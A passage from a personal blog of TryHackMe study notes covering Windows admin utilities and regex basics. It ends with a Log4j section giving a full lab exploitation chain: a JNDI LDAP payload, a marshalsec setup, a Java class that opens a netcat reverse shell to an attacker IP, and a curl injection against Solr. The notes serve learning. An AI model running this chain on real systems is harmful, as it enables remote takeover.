Account"></a>User Account</h3><p>use cmd+r and input <code>lusrmgr.exe</code>  can see user and group<br>User Account Control(UAC)</p><h2 id="Windows-Fundamentals-2"><a href="#Windows-Fundamentals-2" class="headerlink" title="Windows Fundamentals 2"></a>Windows Fundamentals 2</h2><p>The <strong>System Configuration</strong> utility (<code>MSConfig</code>) is for advanced troubleshooting, and its main purpose is to help diagnose startup issues.</p><p>The <strong>Computer Management</strong> (<code>compmgmt</code>) utility has three primary sections: System Tools, Storage, and Services and Applications. <code>compmgmt.msc</code><br><img src="https://assets.tryhackme.com/additional/win-fun2/compmgmt1.png"></p><p>system information : <code>msinfo32.exe</code></p><p>resource monitor <code>resmon</code></p><p>command line  use <code>/?</code> to see the help<br>To clear the command prompt screen, the command is <code>cls</code>.</p><p><strong>Registry Editor</strong> <code>regedit</code> <code>regedt32.exe</code></p><h2 id="Windows-Fundamentals-3"><a href="#Windows-Fundamentals-3" class="headerlink" title="Windows Fundamentals 3"></a>Windows Fundamentals 3</h2><p>windows update<br>windows security</p><p>firewall <code>WF.msc</code> three types : domain,public,private</p><h1 id="Regular-Expressions"><a href="#Regular-Expressions" class="headerlink" title="Regular Expressions"></a>Regular Expressions</h1><p>Regular expressions (or Regex) are patterns of text that you define to search documents and match exactly what you’re looking for.</p><h2 id="charset"><a href="#charset" class="headerlink" title="charset"></a>charset</h2><p> charset is defined by enclosing in <code>[</code> square brackets <code>]</code> the character(s), or range of characters that you want to match.<br> <code>[a-cx-z]zz</code> will match <code>azz</code>, <code>bzz</code>, <code>czz</code>, <code>xzz</code>, <code>yzz</code>, and <code>zzz</code>.<br> Then, there is a way to <strong>exclude</strong> characters from a charset with the <code>^</code> hat symbol, and include everything else.<br> <code>[^a-c]at</code> will match <code>fat</code> and <code>hat</code>, but not <code>bat</code> or <code>cat</code>.</p><h2 id="Wildcards-and-optional-characters"><a href="#Wildcards-and-optional-characters" class="headerlink" title="Wildcards and optional characters"></a>Wildcards and optional characters</h2><p>The wildcard that is used to match any single character (except the line break) is the <code>.</code> dot. That means that <code>a.c</code> will match <code>aac</code>, <code>abc</code>, <code>a0c</code>, <code>a!c</code>, and so on.</p><p>Also, you can set a character as optional in your pattern using the <code>?</code> question mark. That means that <code>abc?</code> will match <code>ab</code> and <code>abc</code>, since the <code>c</code> is optional.</p><p>Note: If you want to search for <code>.</code> a literal dot, you have to <strong>escape it</strong> with a <code>\</code> reverse slash. That means that <code>a.c</code> will match <code>a.c</code>, but also <code>abc</code>, <code>a@c</code>, and so on. But <code>a\.c</code> will match <strong>just</strong> <code>a.c</code>.</p><h2 id="Metacharacters-and-repetitions"><a href="#Metacharacters-and-repetitions" class="headerlink" title="Metacharacters and repetitions"></a>Metacharacters and repetitions</h2><p>There are easier ways to match bigger charsets. For example, <code>\d</code> is used to match any <strong>single</strong> digit. Here’s a reference:<br><code>\d</code> matches a digit, like <code>9</code><br><code>\D</code> matches a non-digit, like <code>A</code> or <code>@</code><br><code>\w</code> matches an alphanumeric character, like <code>a</code> or <code>3</code><br><code>\W</code> matches a non-alphanumeric character, like <code>!</code> or <code>#</code><br><code>\s</code> matches a whitespace character (spaces, tabs, and line breaks)<br><code>\S</code> matches everything else (alphanumeric characters and symbols)</p><p>Note: Underscores <code>_</code> are included in the <code>\w</code> metacharacter and not in <code>\W</code>. That means that <code>\w</code> will match every single character in <code>test_file</code>.</p><p>Often we want a pattern that matches many characters of a single type in a row, and we can do that with repetitions  That means that <code>z&#123;2&#125;</code> will match exactly <code>zz</code>.<br><code>&#123;12&#125;</code> - <strong>exactly 12</strong> times.<br><code>&#123;1,5&#125;</code> - <strong>1 to 5</strong> times.<br><code>&#123;2,&#125;</code> - <strong>2 or more</strong> times.<br><code>*</code> - <strong>0 or more</strong> times.<br><code>+</code> - <strong>1 or more</strong> times.</p><h2 id="Starts-with-ends-with-groups-and-either-or"><a href="#Starts-with-ends-with-groups-and-either-or" class="headerlink" title="Starts with&#x2F; ends with, groups, and either&#x2F; or"></a>Starts with&#x2F; ends with, groups, and either&#x2F; or</h2><p><code>^</code> - starts with<br><code>$</code> - ends with</p><p>To say “or” in Regex, we use the <code>|</code> pipe.<br><code>during the (day|night)</code> will match both of these sentences: <code>during the day</code> and <code>during the night</code>.</p><p>Match every possible IPv4 IP address (use metacharacters and groups)<code>(\d&#123;1,3&#125;\.)&#123;3&#125;\d&#123;1,3&#125;</code></p><h1 id="recent-threats"><a href="#recent-threats" class="headerlink" title="recent threats"></a>recent threats</h1><h2 id="log4j"><a href="#log4j" class="headerlink" title="log4j"></a>log4j</h2><p>The format of the usual syntax that takes advantage of this looks like so: <code>$&#123;jndi:ldap://ATTACKERCONTROLLEDHOST&#125;</code><br>exploitation: </p><ul><li><code>python3 -m http.server</code><br>The first order of business however is obtaining the LDAP Referral Server. We will use the <code>marshalsec</code> utility offered at <a target="_blank" rel="noopener" href="https://github.com/mbechler/marshalsec">https://github.com/mbechler/marshalsec</a></li><li>cd &#x2F;root&#x2F;Rooms&#x2F;solar&#x2F;marshalsec</li><li>mvn clean package -DskipTests</li><li>java -cp target&#x2F;marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “<a target="_blank" rel="noopener" href="http://your.attacker.ip.address:8000/#Exploit">http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit</a>“</li><li><code>Exploit.java</code></li></ul><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="JAVA"><figure class="iseeu highlight /java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Exploit</span> &#123;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            java.lang.Runtime.getRuntime().exec(<span class="string">&quot;nc -e /bin/bash YOUR.ATTACKER.IP.ADDRESS 9999&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div><ul><li>javac Exploit.java -source 8 -target 8</li><li>nc -lnvp 9999</li><li>curl ‘<a target="_blank" rel="noopener" href="http://machine_ip:8983/solr/admin/cores?foo=$%5C%7Bjndi:ldap://YOUR.ATTACKER.IP.ADDRESS:1389/Exploit%5C%7D">http://MACHINE_IP:8983/solr/admin/cores?foo=$\{jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:1389/Exploit\}</a>‘<br>there get a shell</li></ul>


    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>guayu-kakeru
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://guayu-kakeru.github.io/posts/30538.html" title="tryhackme-学习笔记">https://guayu-kakeru.github.io/posts/30538.html</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F/" rel="tag"># 渗透</a>
              <a href="/tags/tryhackme/" rel="tag"># tryhackme</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/posts/36199.html" rel="prev" title="vulnhub-Brainpan">
      <i class="fa fa-chevron-left"></i> vulnhub-Brainpan
    </a></div>
      <div class="post-nav-item">
    <a href="/posts/57685.html" rel="next" title="tryhackme-AD笔记">
      tryhackme-AD笔记 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Web-basic"><span class="nav-text">Web basic</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Web-hacking"><span class="nav-text">Web hacking</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#walking-an-application"><span class="nav-text">walking an application</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#content-discovery"><span class="nav-text">content discovery</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Subdomain-Enumeration"><span class="nav-text">Subdomain Enumeration</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Authentication-Bypass"><span class="nav-text">Authentication Bypass</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#IDOR"><span class="nav-text">IDOR</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSRF"><span class="nav-text">SSRF</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#race-conditions"><span class="nav-text">race conditions</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Pickle-Rick"><span class="nav-text">Pickle Rick</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#OWASP-API-10"><span class="nav-text">OWASP API 10</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Broken-Objective-Level-Authorisation-BOLA"><span class="nav-text">Broken Objective Level Authorisation(BOLA)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Broken-User-Authentication-BUA"><span class="nav-text">Broken User Authentication(BUA)</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#excessive-data-exposure"><span class="nav-text">excessive data exposure</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Lack-of-Resources-rate-limiting"><span class="nav-text">Lack of Resources &amp; rate limiting</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Broken-Function-Level-Authorisation"><span class="nav-text">Broken Function Level Authorisation</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mass-assignment"><span class="nav-text">mass assignment</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Security-Misconfiguration"><span class="nav-text">Security Misconfiguration</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Injection"><span class="nav-text">Injection</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Improper-Assets-Management"><span class="nav-text">Improper Assets Management</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Insufficient-Logging-Monitoring"><span class="nav-text">Insufficient Logging &amp; Monitoring</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#OWASP10"><span class="nav-text">OWASP10</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#IAAA-Failures"><span class="nav-text">IAAA Failures</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#what-is-IAAA"><span class="nav-text">what is IAAA</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#A01-Broken-Access-Control"><span class="nav-text">A01: Broken Access Control</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#A07-Authentication-Failures"><span class="nav-text">A07: Authentication Failures</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#A09-Logging-Alerting-Failures"><span class="nav-text">A09: Logging &amp; Alerting Failures</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Application-Design-Flaws"><span class="nav-text">Application Design Flaws</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#AS02-Security-Misconfigurations"><span class="nav-text">AS02:Security Misconfigurations</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#AS03-Software-Supply-Chain-Failures"><span class="nav-text">AS03: Software Supply Chain Failures</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#AS04-Cryptographic-Failures"><span class="nav-text">AS04: Cryptographic Failures</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#AS06-Insecure-Design"><span class="nav-text">AS06: Insecure Design</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Insecure-Data-Handling"><span class="nav-text">Insecure Data Handling</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A04-Cryptographic-Failures"><span class="nav-text">A04: Cryptographic Failures</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#A05-Injection"><span class="nav-text">A05: Injection</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#A08-Software-or-Data-Integrity-Failures"><span class="nav-text">A08: Software or Data Integrity Failures</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#FIX"><span class="nav-text">FIX</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Windows-and-AD-Fundamentals"><span class="nav-text">Windows and AD Fundamentals</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Windows-and-AD-Fundamentals-1"><span class="nav-text">Windows and AD Fundamentals</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#gui"><span class="nav-text">gui</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#File-system"><span class="nav-text">File system:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#User-Account"><span class="nav-text">User Account</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Windows-Fundamentals-2"><span class="nav-text">Windows Fundamentals 2</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Windows-Fundamentals-3"><span class="nav-text">Windows Fundamentals 3</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Regular-Expressions"><span class="nav-text">Regular Expressions</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#charset"><span class="nav-text">charset</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Wildcards-and-optional-characters"><span class="nav-text">Wildcards and optional characters</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Metacharacters-and-repetitions"><span class="nav-text">Metacharacters and repetitions</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Starts-with-ends-with-groups-and-either-or"><span class="nav-text">Starts with&#x2F; ends with, groups, and either&#x2F; or</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#recent-threats"><span class="nav-text">recent threats</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#log4j"><span class="nav-text">log4j</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="guayu-kakeru"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">guayu-kakeru</p>
  <div class="site-description" itemprop="description">一年过后，你会希望从今天就开始行动。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">88</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">19</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/guayu-kakeru" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;guayu-kakeru" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/1806449041@qq.com" title="E-Mail → 1806449041@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



  <div class="links-of-recent-posts motion-element">
    <div class="links-of-recent-posts-title">
      <i class="fa fa-history fa-fw"></i>
      最近文章
    </div>
    <ul class="links-of-recent-posts-list">
        <li class="links-of-recent-posts-item">
          <a href="/posts/11248.html" title="posts&#x2F;11248.html">XXE漏洞学习笔记</a>
        </li>
        <li class="links-of-recent-posts-item">
          <a href="/posts/19220.html" title="posts&#x2F;19220.html">xmu新生赛web wp</a>
        </li>
        <li class="links-of-recent-posts-item">
          <a href="/posts/1.html" title="posts&#x2F;1.html"></a>
        </li>
        <li class="links-of-recent-posts-item">
          <a href="/posts/3265.html" title="posts&#x2F;3265.html">Windows工具</a>
        </li>
        <li class="links-of-recent-posts-item">
          <a href="/posts/57685.html" title="posts&#x2F;57685.html">tryhackme-AD笔记</a>
        </li>
    </ul>
  </div>
      </div>

      
      
        <div class="links-of-blogroll motion-element links-of-blogroll-undefined">
          <div class="links-of-blogroll-title">
            <i class="fa fa-history fa-" aria-hidden="true"></i>
            
          </div>
          <ul class="links-of-blogroll-list">
            
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
              <li class="recent_posts_li">
                <a href="/" title="" target="_blank"></a>
              </li>
            
          </ul>
        </div>
      
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">guayu-kakeru</span>
</div>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
